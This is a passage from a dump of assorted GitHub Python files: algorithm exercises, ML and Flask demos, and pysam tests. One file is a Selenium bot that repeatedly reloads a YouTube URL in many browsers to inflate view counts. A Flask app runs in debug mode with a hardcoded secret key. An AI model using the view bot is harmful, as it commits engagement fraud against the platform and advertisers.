-1:\n\t\tprint(1)\n\telse:\n\t\tprint(0)\n","repo_name":"kwheelerj/Python_Algorithms","sub_path":"assignment03/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73841535474","text":"# Print out all prime numbers up to 100\nimport math\n\n# First simplistic iteration\ndef simple_primes(num):\n prime = True\n for i in range(2, num):\n if (num % i == 0):\n prime = False\n if (prime):\n print(num)\n\n# Pythonic version\ndef pythonic_primes1(num):\n if all(num % i != 0 for i in range(2, num)):\n print(num)\n\n# only checking 2 to sqrt(num)\ndef pythonic_primes2(num):\n if all(num % i != 0 for i in range(2, int(math.sqrt(num)) + 1)):\n print(num)\n\n# The real optimum implementation - Sieving\ndef sieve_primes(num):\n sieve = [True] * (num + 1)\n for prime in range(2, num + 1):\n if (sieve[prime]):\n print(prime)\n for i in range(prime, num + 1, prime):\n sieve[i] = False\n\n# Iterative version of prime generation\ndef gen_primes():\n# Sieve of Eratosthenes\n# Code by David Eppstein, UC Irvine, 28 Feb 2002\n# http://code.activestate.com/recipes/117119/\n D = {}\n q = 2\n while True:\n if q not in D:\n yield q\n D[q * q] = [q]\n else:\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 1\n\nif __name__ == \"__main__\":\n input_number = input('Enter the range: ')\n sieve_primes(int(input_number))\n print(\"------End Sequence------\")\n\n for index, n in zip(range(100), gen_primes()):\n print(index, n)\n","repo_name":"BenWarwick-Champion/CodeChallenges","sub_path":"prime_numbers.py","file_name":"prime_numbers.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 
+{"seq_id":"36537289145","text":"from flask import Flask, render_template,redirect,request,url_for,session,jsonify,send_file\r\nfrom Project1 import test_sample\r\nfrom Project1 import logreg\r\nfrom Project1 import model1\r\nfrom Project1 import model2\r\nfrom Project1 import RFC\r\nfrom Project1 import classifier_linear\r\nfrom Project1 import csv_predict\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef home():\r\n if request.method == 'POST':\r\n option = request.form['options']\r\n option=str(option)\r\n print(\"OPTION IS ==== \", option)\r\n senti=request.form['sentence']\r\n if option == \"logreg\":\r\n flag=test_sample(logreg, senti)\r\n elif option == \"RFC\":\r\n flag=test_sample(RFC, senti)\r\n elif option == \"classifier_linear\":\r\n flag=test_sample(classifier_linear, senti)\r\n elif option == \"file_upload\":\r\n f = request.files['filename']\r\n csv_predict(f)\r\n flag=2\r\n return render_template('index.html',flag=flag,senti=senti)\r\n else:\r\n return render_template('index.html',flag=-1)\r\n\r\n@app.route('/download')\r\ndef download():\r\n\tpath = \"./Predicted.csv\"\r\n\treturn send_file(path, as_attachment=True)\r\n\r\nif __name__ == \"__main__\":\r\n app.secret_key='arun'\r\n app.run(debug=True)","repo_name":"ThakkarJAY1/Sentiment-Analysis-","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34069448177","text":"\nN, M = map(int, input().split())\n#N, M = 4, 2\n# N까지 번호가 적힌 구슬, 이중에 M 개를 뽑는 방법의 수\n\nmarvel =[]\nfor i in range(1, N+1):\n marvel.append(i)\ncount = 0\ndef cal(arr, idx):\n if M == len(arr):\n global count\n count += 1\n for ele in arr:\n print(ele, end=\" \")\n print()\n return\n if idx >= N:\n return\n arr.append( marvel[idx] )\n cal(arr, idx+1)\n arr.pop()\n cal(arr, idx+1)\n\narr = []\ncal(arr, 0)\nprint(count)\n\n\n","repo_name":"moon-1105/firstPython","sub_path":"section6/10. 조합구하기_moon.py","file_name":"10. 
조합구하기_moon.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29300809700","text":"from matplotlib.ticker import FuncFormatter\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n# some_file.py\r\nimport sys\r\nimport os\r\n\r\n\r\n# insert at 1, 0 is the script path (or '' in REPL)\r\n#sys.path.insert(0, \"E:\\Python\\Data\")\r\ndata_path = os.path.join(os.path.dirname(__file__), '../Data')\r\nsys.path.append(data_path)\r\n\r\nimport ReadFile as rf\r\n\r\n# region Parsing of the file\r\nfrom scipy.spatial import distance\r\ndef KNN(trainingData, image):\r\n aux = 10000.0\r\n valueTest = \"\"\r\n for i in trainingData:\r\n tmp = distance.euclidean(i.Data, image)\r\n if tmp < aux:\r\n aux = tmp\r\n valueTest = i.Name\r\n\r\n return valueTest\r\n\r\n\r\n\r\n\r\ndef main():\r\n trainingData = rf.ReadFile(os.path.join(data_path ,\"optdigits.tra\")) # Extract Training Data\r\n testingData = rf.ReadFile(os.path.join(data_path , \"optdigits.tes\")) # Extract Testing Data\r\n Errors = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # Errors per number\r\n Occurs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # Number of occurs per number\r\n MaxTotalError = 0\r\n\r\n Bar = np.arange(11)\r\n X = np.arange(11)\r\n\r\n for i in testingData:\r\n value = i.Name\r\n newValue = KNN(trainingData, i.Data)\r\n Occurs[int(i.Name)] += 1\r\n if value != newValue:\r\n MaxTotalError += 1\r\n Errors[int(i.Name)] += 1\r\n print(value + \"//\" + newValue)\r\n\r\n print(\"Accuracy on the testing set with k-nn :\")\r\n Accuracy = 100 - ((MaxTotalError / len(testingData)) * 100)\r\n print(Accuracy)\r\n\r\n X[len(X) - 1] = Accuracy\r\n for i in range(len(Errors)):\r\n print(\"Accuracy on the testing \" + str(i))\r\n x = 100 - (Errors[i] / Occurs[i] * 100)\r\n X[i] = x\r\n print(x)\r\n\r\n # Show Data Graph\r\n plt.bar(Bar, X)\r\n plt.xticks(Bar, ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'Total'])\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"R1C4RDO13/Python_APA","sub_path":"KNN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26723087674","text":"\"\"\"Module describing logical banking actions (to be used in routes).\"\"\"\nfrom ..common.utils import convert_date_to_midnight_timestamp\nfrom .accounts import BankAccountHandler, BankAccountTypeHandler\n\n\ndef get_bank_account_type_grouping(bank):\n \"\"\"Get a summary of accounts for the given bank, grouped by type.\"\"\"\n # Get a grouping (by account type) of accounts at the given bank\n type_accounts = {}\n for account_type in BankAccountTypeHandler.get_types_for_bank(bank.id):\n # Get only accounts for the logged in user and the given bank\n type_accounts[account_type] = BankAccountHandler.get_accounts(\n bank_ids=(bank.id,),\n account_type_ids=(account_type.id,),\n )\n return type_accounts\n\n\ndef get_balance_chart_data(transactions):\n \"\"\"\n Build a dataset to be passed to a `chartist.js` chart constructor.\n\n Parameters\n ----------\n transactions : list\n A list of transactions to be used for generating the chart data.\n\n Returns\n -------\n chart_data : list\n A list of sorted (x, y) pairs consisting of the Unix timestamp\n (in milliseconds) and the bank account balance.\n \"\"\"\n chart_data = sorted(map(_make_transaction_balance_ordered_pair, transactions))\n return chart_data\n\n\ndef 
_make_transaction_balance_ordered_pair(transaction):\n # Create an ordered pair of date (timestamp) and account balance\n timestamp = convert_date_to_midnight_timestamp(\n transaction.transaction_date, milliseconds=True\n )\n return timestamp, transaction.balance\n","repo_name":"mitchnegus/monopyly","sub_path":"monopyly/banking/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35949115261","text":"from io import BytesIO\n\nfrom audio_purifier import purify, purify_and_export\nfrom pydub import AudioSegment\n\n\ndef test_purify_wav_file_successfully():\n raw_wav_audio_path = \"tests/data/raw_audio.wav\"\n raw_audio_segment = AudioSegment.from_file(raw_wav_audio_path)\n assert int(len(raw_audio_segment) / 1000) == 16\n\n result_byte_io = purify(raw_wav_audio_path)\n\n processed_audio_segment = AudioSegment.from_file(result_byte_io)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_other_than_wav_file_successfully():\n other_audio_path = \"tests/data/raw_audio.m4a\"\n other_audio_segment = AudioSegment.from_file(other_audio_path)\n assert int(len(other_audio_segment) / 1000) == 16\n\n result_byte_io = purify(other_audio_path, export_format=\"mp3\")\n\n processed_audio_segment = AudioSegment.from_file(result_byte_io)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_silences_return_none():\n silences_audio_path = \"tests/data/silences.m4a\"\n raw_audio_segment = AudioSegment.from_file(silences_audio_path)\n assert int(len(raw_audio_segment) / 1000) == 4\n\n result_byte_io = purify(silences_audio_path, export_format=\"mp3\")\n\n assert result_byte_io is None\n\n\ndef test_purify_and_export_wav_file_successfully():\n exported_wav_file = BytesIO()\n\n assert exported_wav_file.getvalue() == b\"\"\n\n raw_wav_audio_path = \"tests/data/raw_audio.wav\"\n\n purify_and_export(raw_wav_audio_path, exported_wav_file)\n\n assert exported_wav_file.getvalue()\n exported_wav_file.seek(0)\n\n processed_audio_segment = AudioSegment.from_file(exported_wav_file)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_and_export_other_than_wav_file_successfully():\n exported_mp3_file = BytesIO()\n\n assert exported_mp3_file.getvalue() == b\"\"\n\n raw_wav_audio_path = \"tests/data/raw_audio.m4a\"\n\n purify_and_export(raw_wav_audio_path, exported_mp3_file, export_format=\"mp3\")\n\n assert exported_mp3_file.getvalue()\n exported_mp3_file.seek(0)\n\n processed_audio_segment = AudioSegment.from_file(exported_mp3_file)\n assert int(len(processed_audio_segment) / 1000) == 5\n","repo_name":"huynguyengl99/audio-purifier","sub_path":"tests/test_purifier.py","file_name":"test_purifier.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18583739477","text":"from selenium import webdriver\r\nimport time\r\nimport random\r\nimport threading\r\n\r\ndriver = 'driver/chromedriver'\r\n\r\nprint('How many views you want? 
|Terminate by STOP')\r\nviews = 0\r\nwhile True:\r\n    entry = input('')\r\n    if entry == 'STOP':\r\n        break\r\n    views = int(entry)  # input() returns a string; keep the last number entered\r\n\r\nprint('Enter URL |Terminate by STOP')\r\nurl = ''\r\nwhile True:\r\n    entry = input('')\r\n    if entry == 'STOP':\r\n        break\r\n    url = entry  # keep the last URL entered\r\n\r\n\r\ndef viewVideo(browser):\r\n    while(True):\r\n        browser.get(url)\r\n        time.sleep(random.randint(4, 11))\r\n\r\n\r\nfor i in range(views):\r\n    browserThread = threading.Thread(\r\n        target=viewVideo, args=(webdriver.Chrome(driver),))  # args must be a tuple\r\n    browserThread.start()\r\n\r\ntime.sleep(random.randint(180, 430))\r\n","repo_name":"Grossnicklaus/YouTube_View_Bot","sub_path":"YouTubeViewBot/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"18055921213","text":"# ask the user the question ?\n# as long as quit has not been answered, ask the question again\n# print the number of times the question was asked\n\naantal = 0\nquestion = input(\"?\")\nwhile True:\n    if question == \"quit\":\n        print(aantal)\n        quit()\n    else:\n        aantal +=1\n        question = input(\"?\")\n    \n    \n\n\n\n\n\n","repo_name":"Bartkuip/leren_programmeren","sub_path":"03_keer_op_keer/quit.py","file_name":"quit.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22745239416","text":"import sys\nsys.stdin = open('input.txt')\n\ndef bingo():\n    cnt = 0\n    for i in range(5):\n        tmp = 0\n        for j in range(5):\n            tmp += check[i][j]\n        if tmp == 5:\n            cnt += 1\n    for i in range(5):\n        tmp = 0\n        for j in range(5):\n            tmp += check[j][i]\n        if tmp == 5:\n            cnt += 1\n    tmp = 0\n    for i in range(5):\n        tmp += check[i][i]\n    if tmp == 5:\n        cnt += 1\n    tmp = 0\n    for i in range(5):\n        tmp += check[4-i][i]\n    if tmp == 5:\n        cnt += 1\n    if cnt >= 3:\n        return True\n    else:\n        return False\nbingo_board = []\nnum = []\nfor _ in range(5):\n    bingo_board += list(map(int, input().split()))\n\nfor _ in range(5):\n    num += list(map(int, input().split()))\ncheck = [[0]*5 for _ in range(5)]\n\nfor i in range(25):\n    idx = bingo_board.index(num[i])\n    row, col = idx//5, idx%5\n    check[row][col] = 1\n    if bingo():\n        break\nprint(i+1)","repo_name":"QT-HH/Algorithm","sub_path":"BOJ/2578_빙고/2578_빙고_3.py","file_name":"2578_빙고_3.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"8362463170","text":"#!/usr/bin/env python\n'''unit testing code for pysam.\n\nExecute in the :file:`tests` directory as it requires the Makefile\nand data files located there.\n'''\n\nimport sys, os, shutil, gzip\nimport pysam\nimport unittest\nimport itertools\nimport subprocess\n\ndef checkBinaryEqual( filename1, filename2 ):\n    '''return true if the two files are binary equal.'''\n    if os.path.getsize( filename1 ) != os.path.getsize( filename2 ):\n        return False\n\n    infile1 = open(filename1, \"rb\")\n    infile2 = open(filename2, \"rb\")\n\n    def chariter( infile ):\n        while 1:\n            c = infile.read(1)\n            if c == \"\": break\n            yield c\n\n    found = False\n    for c1,c2 in itertools.izip( chariter( infile1), chariter( infile2) ):\n        if c1 != c2: break\n    else:\n        found = True\n\n    infile1.close()\n    infile2.close()\n    return found\n\nclass TestIndexing(unittest.TestCase):\n    filename = \"example.gtf.gz\" \n    filename_idx = \"example.gtf.gz.tbi\" \n\n    def setUp( self ):\n        \n        self.tmpfilename = \"tmp_%i.gtf.gz\" % id(self)\n        shutil.copyfile( self.filename, self.tmpfilename )\n\n    def testIndexPreset( self ):\n        '''test 
indexing via preset.'''\n\n pysam.tabix_index( self.tmpfilename, preset = \"gff\" )\n checkBinaryEqual( self.tmpfilename + \".tbi\", self.filename_idx )\n\n def tearDown( self ):\n os.unlink( self.tmpfilename )\n os.unlink( self.tmpfilename + \".tbi\" )\n\nclass TestCompression(unittest.TestCase):\n filename = \"example.gtf.gz\" \n filename_idx = \"example.gtf.gz.tbi\" \n\n def setUp( self ):\n \n self.tmpfilename = \"tmp_%i.gtf\" % id(self)\n infile = gzip.open( self.filename, \"r\")\n outfile = open( self.tmpfilename, \"w\" )\n outfile.write( \"\".join(infile.readlines()) )\n outfile.close()\n infile.close()\n\n def testIndexPreset( self ):\n '''test indexing via preset.'''\n\n pysam.tabix_index( self.tmpfilename, preset = \"gff\" )\n checkBinaryEqual( self.tmpfilename + \".gz\", self.filename )\n checkBinaryEqual( self.tmpfilename + \".gz.tbi\", self.filename_idx )\n\n def tearDown( self ):\n os.unlink( self.tmpfilename + \".gz\" )\n os.unlink( self.tmpfilename + \".gz.tbi\" )\n\nclass TestIteration( unittest.TestCase ):\n\n filename = \"example.gtf.gz\" \n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n lines = [ x for x in gzip.open(self.filename).readlines() if not x.startswith(\"#\") ]\n # creates index of contig, start, end, adds content without newline.\n self.compare = [ \n (x[0][0], int(x[0][3]), int(x[0][4]), x[1]) \n for x in [ (y.split(\"\\t\"), y[:-1]) for y in lines ] ]\n \n def getSubset( self, contig = None, start = None, end = None):\n \n if contig == None:\n # all lines\n subset = [ x[3] for x in self.compare ]\n else:\n if start != None and end == None:\n # until end of contig\n subset = [ x[3] for x in self.compare if x[0] == contig and x[2] > start ]\n elif start == None and end != None:\n # from start of contig\n subset = [ x[3] for x in self.compare if x[0] == contig and x[1] <= end ]\n elif start == None and end == None:\n subset = [ x[3] for x in self.compare if x[0] == contig ]\n else:\n # all within interval\n subset = [ x[3] for x in self.compare if x[0] == contig and \\\n min( x[2], end) - max(x[1], start) > 0 ]\n \n return subset\n\n def checkPairwise( self, result, ref ):\n\n result.sort()\n ref.sort()\n\n a = set(result)\n b = set(ref)\n\n self.assertEqual( len(result), len(ref),\n \"unexpected number of results: %i, expected %i, differences are %s: %s\" \\\n % (len(result), len(ref),\n a.difference(b), \n b.difference(a) ))\n\n for x, d in enumerate( zip( result, ref )):\n self.assertEqual( d[0], d[1],\n \"unexpected results in pair %i: '%s', expected '%s'\" % \\\n (x, \n d[0], \n d[1]) )\n\n\n def testAll( self ):\n result = list(self.tabix.fetch())\n ref = self.getSubset( )\n self.checkPairwise( result, ref )\n\n def testPerContig( self ):\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n result = list(self.tabix.fetch( contig ))\n ref = self.getSubset( contig )\n self.checkPairwise( result, ref )\n \n def testPerContigToEnd( self ):\n \n end = None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for start in range( 0, 200000, 1000):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n\n def testPerContigFromStart( self ):\n \n start = None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for end in range( 0, 200000, 1000):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n\n def testPerContig( self ):\n \n start, end = 
None, None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n \n def testPerInterval( self ):\n \n start, end = None, None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for start in range( 0, 200000, 2000):\n for end in range( start, start + 2000, 500):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n \n\n def testInvalidIntervals( self ):\n \n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", 0, -10)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", -10, 200)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", 200, 0)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", -10, -20)\n self.assertRaises( ValueError, self.tabix.fetch, \"chrUn\" )\n\n def testGetContigs( self ):\n self.assertEqual( sorted(self.tabix.contigs), [\"chr1\", \"chr2\"] )\n # check that contigs is read-only\n self.assertRaises( AttributeError, setattr, self.tabix, \"contigs\", [\"chr1\", \"chr2\"] )\n\n def testHeader( self ):\n ref = []\n for x in gzip.open( self.filename ):\n if not x.startswith(\"#\"): break\n ref.append( x[:-1] )\n header = list( self.tabix.header )\n self.assertEqual( ref, header )\n\n def testReopening( self ):\n '''test repeated opening of the same file.'''\n def func1():\n # opens any tabix file\n inf = pysam.Tabixfile(self.filename)\n return\n\n for i in range(10000):\n func1()\n\n\nclass TestParser( unittest.TestCase ):\n\n filename = \"example.gtf.gz\" \n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n self.compare = [ x[:-1].split(\"\\t\") for x in gzip.open( self.filename, \"r\") if not x.startswith(\"#\") ]\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n self.assertEqual( len(self.compare[x]), len(r) )\n\n # test indexing\n for c in range(0,len(r)):\n self.assertEqual( self.compare[x][c], r[c] )\n\n # test slicing access\n for c in range(0, len(r)-1):\n for cc in range(c+1, len(r)):\n self.assertEqual( self.compare[x][c:cc],\n r[c:cc] )\n\n def testWrite( self ):\n \n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n c = list(r)\n for y in range(len(r)):\n r[y] = \"test_%05i\" % y\n c[y] = \"test_%05i\" % y\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join( c ), str(r) )\n # check second assignment\n for y in range(len(r)):\n r[y] = \"test_%05i\" % y\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join( c ), str(r) )\n\n def testUnset( self ):\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n c = list(r)\n e = list(r)\n for y in range(len(r)):\n r[y] = c[y] = None\n e[y] = \"\"\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join(e), str(r) )\n\nclass TestGTF( TestParser ):\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asGTF() )):\n c = self.compare[x]\n \n self.assertEqual( len(c), len(r) )\n self.assertEqual( \"\\t\".join(c), str(r) )\n self.assertTrue( r.gene_id.startswith(\"ENSG\") )\n if r.feature != \"gene\":\n self.assertTrue( r.transcript_id.startswith(\"ENST\") )\n self.assertEqual( c[0], r.contig )\n\nclass TestBed( unittest.TestCase ):\n filename = 
\"example.bed.gz\"\n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n self.compare = [ x[:-1].split(\"\\t\") for x in gzip.open( self.filename, \"r\") if not x.startswith(\"#\") ]\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asBed() )):\n c = self.compare[x]\n self.assertEqual( \"\\t\".join( c ), str(r) )\n self.assertEqual( list(c), list(r) )\n self.assertEqual( c[0], r.contig)\n self.assertEqual( int(c[1]), r.start)\n self.assertEqual( int(c[2]), r.end)\n\n def testWrite( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asBed() )):\n c = self.compare[x]\n self.assertEqual( \"\\t\".join( c ), str(r) )\n self.assertEqual( list(c), list(r) )\n\n r.contig = \"test\"\n self.assertEqual( \"test\", r.contig)\n self.assertEqual( \"test\", r[0])\n\n r.start += 1\n self.assertEqual( int(c[1]) + 1, r.start )\n self.assertEqual( str(int(c[1]) + 1), r[1] )\n\n r.end += 1\n self.assertEqual( int(c[2]) + 1, r.end )\n self.assertEqual( str(int(c[2]) + 1), r[2] )\n\nclass TestVCF( TestParser ):\n\n filename = \"example.vcf40.gz\"\n columns = (\"contig\", \"pos\", \"id\", \n \"ref\", \"alt\", \"qual\", \n \"filter\", \"info\", \"format\" )\n\n def testRead( self ):\n \n ncolumns = len(self.columns) \n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asVCF() )):\n c = self.compare[x]\n for y, field in enumerate( self.columns ):\n if field == \"pos\":\n self.assertEqual( int(c[y]) - 1, getattr( r, field ) )\n self.assertEqual( int(c[y]) - 1, r.pos )\n else:\n self.assertEqual( c[y], getattr( r, field ), \n \"mismatch in field %s: %s != %s\" %\\\n ( field,c[y], getattr( r, field ) ) )\n self.assertEqual( len(c), len( r ) + ncolumns )\n \n for y in range(len(c) - ncolumns):\n self.assertEqual( c[ncolumns+y], r[y] )\n \n def testWrite( self ):\n\n ncolumns = len(self.columns) \n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asVCF() )):\n\n c = self.compare[x]\n\n # check unmodified string\n ref_string = \"\\t\".join( c )\n cmp_string = str(r)\n self.assertEqual( ref_string, cmp_string )\n\n # set fields and compare field-wise\n for y, field in enumerate( self.columns ):\n if field == \"pos\":\n rpos = getattr( r, field )\n self.assertEqual( int(c[y]) - 1, rpos )\n self.assertEqual( int(c[y]) - 1, r.pos )\n # increment pos by 1\n setattr( r, field, rpos + 1 )\n self.assertEqual( getattr( r, field ), rpos + 1 )\n c[y] = str(int(c[y]) + 1 ) \n else:\n setattr( r, field, \"test_%i\" % y)\n c[y] = \"test_%i\" % y\n self.assertEqual( c[y], getattr( r, field ), \n \"mismatch in field %s: %s != %s\" %\\\n ( field,c[y], getattr( r, field ) ) )\n\n self.assertEqual( len(c), len( r ) + ncolumns )\n \n for y in range(len(c) - ncolumns):\n c[ncolumns+y] = \"test_%i\" % y\n r[y] = \"test_%i\" % y\n self.assertEqual( c[ncolumns+y], r[y] )\n\nclass TestVCF( TestParser ):\n\n filename = \"example.vcf40.gz\"\n\n def testOpening( self ):\n while 1:\n infile = pysam.Tabixfile( self.filename )\n infile.close()\n\n \n # check strings\n ref_string = \"\\t\".join( c )\n cmp_string = str(r)\n \n self.assertEqual( ref_string, cmp_string )\n\nif __name__ == \"__main__\":\n\n unittest.main()\n\n\n","repo_name":"NYU-BFX/RNA-Seq_Standard","sub_path":"code/utilities/CPAT-1.2.2/lib/tests/tabix_test.py","file_name":"tabix_test.py","file_ext":"py","file_size_in_byte":13978,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"39"} +{"seq_id":"29669700227","text":"team_name = 'Team21'\nstrategy_name = 
'Betray 90% unless Colluded within last 10 rounds.'\nstrategy_description = strategy_name\n\nimport random\n\n\ndef move(my_history, their_history, my_score, their_score):\n\n if 'c' in their_history[-10:]: \n return 'c' \n else:\n if random.random()<0.1: \n return 'c' \n else:\n return 'b' \n","repo_name":"CSP-ESUMS-Bourhrous/iterative-prisoners-dilemma-2A","sub_path":"Team21.py","file_name":"Team21.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"70657085234","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.forms import Select, SelectMultiple\n\nimport unittest\n\nfrom package.models import Version\n\nfrom crichtonweb.core.models import crichtonModel\nfrom crichtonweb.core.widgets import ReadOnlySelect, ReadOnlySelectMultiple\n\nclass crichtonTestCase(TestCase):\n def run_std_tsts(self, thing, test_admin=True):\n \n self.assertTrue(isinstance(thing, crichtonModel))\n \n if thing.has_api:\n # check that we can get at it through the REST API endpoint\n response = self.client.get(thing.get_api_url(\"xml\"))\n self.assertEqual(response.status_code, 200)\n \n # Check it has the other standard methods and they are callable\n thing.get_link()\n thing.get_absolute_url()\n thing.get_view_url()\n \n if test_admin:\n # create user\n from django.contrib.auth.models import User\n USERNAME = 'testuser'\n USEREMAIL = 'test@user.com'\n USERPW = 'testpw'\n \n if not User.objects.filter(username=USERNAME).exists():\n User.objects.create_superuser(USERNAME, USEREMAIL, USERPW)\n \n HTTP_SSLCLIENTCERTSUBJECT=\"Email=%s, CN=%s,\" % (USEREMAIL, USERNAME)\n \n # login\n c = Client()\n # SOCOM-160 this bit doesn't work:\n # c.login(username=USERNAME, password=USERPW)\n \n # and the Admin interface\n response = c.get(thing.get_absolute_url(), HTTP_SSLCLIENTCERTSUBJECT=HTTP_SSLCLIENTCERTSUBJECT)\n #self.assertEqual(response.content, \"XX\")\n self.assertEqual(response.status_code, 200)\n\nclass CoreWidgetsTest(crichtonTestCase):\n def test_readonlyselect_widget(self):\n choices = ((\"key1\",\"val1\"), (\"key2\",\"val2\"),(\"key3\",\"val3\"))\n widg = ReadOnlySelect(Select(choices=choices))\n # Single choice (regular select widget)\n output = widg.render(name=\"testname\", value=\"key2\")\n self.assertEqual(output, u'\\n')\n # Multiple choices:\n multiwidg = ReadOnlySelectMultiple(SelectMultiple(choices=choices))\n output = multiwidg.render(name=\"testname\", value=(\"key2\", \"key3\"))\n self.assertEqual(output, u'\\n\\n')\n\n# eof\n","repo_name":"bpluly/crichton","sub_path":"crichtonweb/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31650444062","text":"#\r\n# Copyright (c) 2018 Intel Corporation\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n\r\nimport logging\r\nfrom ie_serving.config import 
GLOBAL_CONFIG\r\n\r\navailable_lvl_of_logger = ['INFO', 'DEBUG', 'ERROR']\r\n\r\n\r\ndef get_logger_lvl():\r\n requested_lvl = GLOBAL_CONFIG['logging_level']\r\n requested_lvl = requested_lvl.upper()\r\n global LOGGER_LVL\r\n if requested_lvl in available_lvl_of_logger:\r\n return requested_lvl\r\n return 'INFO'\r\n\r\n\r\nLOGGER_LVL = get_logger_lvl()\r\n\r\n\r\ndef get_logger(name):\r\n logger = logging.getLogger(name)\r\n log_formatter = logging.Formatter(\"%(asctime)s - %(name)s - \"\r\n \"%(levelname)s - %(message)s\")\r\n logger.setLevel(LOGGER_LVL)\r\n\r\n console_handler = logging.StreamHandler()\r\n console_handler.setFormatter(log_formatter)\r\n logger.addHandler(console_handler)\r\n\r\n if GLOBAL_CONFIG['log_path'] is not None:\r\n file_handler = logging.FileHandler(GLOBAL_CONFIG['log_path'])\r\n file_handler.setFormatter(log_formatter)\r\n logger.addHandler(file_handler)\r\n\r\n return logger\r\n","repo_name":"puzuwe/openvino-model-server-k8s-terraform","sub_path":"OpenVINO-model-server/ie_serving/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9252710511","text":"# Chris Davis -- 4/24/16\n# DataFormatClasses -- methods that format various information from database so it is more usable\n\nfrom .models import Pokedex\n\n\ndef formatAbilities(abilityRaw, hidability):\n 